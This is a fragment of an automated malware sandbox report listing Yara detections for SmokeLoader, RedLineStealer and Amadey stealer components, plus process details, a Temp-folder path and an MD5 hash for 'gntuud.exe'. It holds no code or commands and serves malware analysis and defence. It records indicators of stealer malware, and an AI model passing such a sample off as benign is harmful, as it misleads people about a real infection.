                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000002B.00000002.605352083.0000000002101000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000002B.00000002.605352083.0000000002101000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000002B.00000002.603086862.0000000000490000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000002B.00000002.603086862.0000000000490000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000002B.00000002.603006628.0000000000470000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000002B.00000002.603522638.00000000004A4000.00000040.00000020.00020000.00000000.sdmp, Author: unknown

                                              Target ID:44
                                              Start time:20:10:01
                                              Start date:13/12/2022
                                              Path:C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe
                                              Imagebase:0xf00000
                                              File size:249344 bytes
                                              MD5 hash:C6524CC2CB091E23BE6D9526D6BCBC99
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000002C.00000000.541818627.0000000000F01000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000002C.00000002.547069275.0000000000F01000.00000020.00000001.01000000.0000000D.sdmp, Author: Joe Security

                                              No disassembly